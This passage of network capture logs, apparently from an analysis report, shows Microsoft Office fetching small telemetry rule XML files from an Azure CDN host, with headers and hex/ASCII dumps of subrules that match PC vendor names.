                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                        x-ms-request-id: 4628c04c-d01e-0017-18cc-45b035000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125316Z-1746fd949bd77mkmhC1EWR5efc00000001d000000000addf
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        7192.168.2.74971013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:16 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                        x-ms-request-id: d3611829-901e-007b-22c2-45ac50000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125316Z-1746fd949bdfg4slhC1EWR34t00000000160000000001vue
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        8192.168.2.74970813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:16 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                        x-ms-request-id: c2908fd4-501e-00a0-4ac8-459d9f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125316Z-1746fd949bd6zq92hC1EWRry48000000019g0000000016z3
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        9192.168.2.74971113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:16 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 467
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                        x-ms-request-id: dbf49064-101e-00a2-1bc6-459f2e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125316Z-1746fd949bdlqd7fhC1EWR6vt000000001a0000000009x5g
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        10192.168.2.74971213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:16 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 632
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                        x-ms-request-id: 4a622c55-e01e-0099-7fc1-45da8a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125316Z-1746fd949bdl6zq5hC1EWRf3ws00000000v00000000095u9
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        11192.168.2.74971913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:18 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:19 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                        x-ms-request-id: 864f0b94-901e-00a0-42cc-456a6d000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125319Z-1746fd949bddgsvjhC1EWRum2c00000001mg0000000006kd
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:19 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        12192.168.2.74971813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:18 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:18 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                        x-ms-request-id: 6223bc78-401e-0015-38b6-450e8d000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125318Z-1746fd949bdkw94lhC1EWRxuz4000000018g00000000c28w
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:19 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        13192.168.2.74971513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:18 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:18 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                        x-ms-request-id: 2b878731-501e-008c-34ce-45cd39000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125318Z-1746fd949bd6ztf6hC1EWRvq2s00000000v0000000007yae
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:19 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        14192.168.2.74971713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:18 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:18 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                        x-ms-request-id: 6818e2c2-d01e-0065-16d2-45b77a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125318Z-1746fd949bdlnsqphC1EWRurw00000000120000000007vkf
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:19 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        15192.168.2.74971613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:18 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:19 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                        x-ms-request-id: c2a94a43-501e-00a0-7dd0-459d9f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125319Z-1746fd949bdkw94lhC1EWRxuz400000001g0000000000399
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
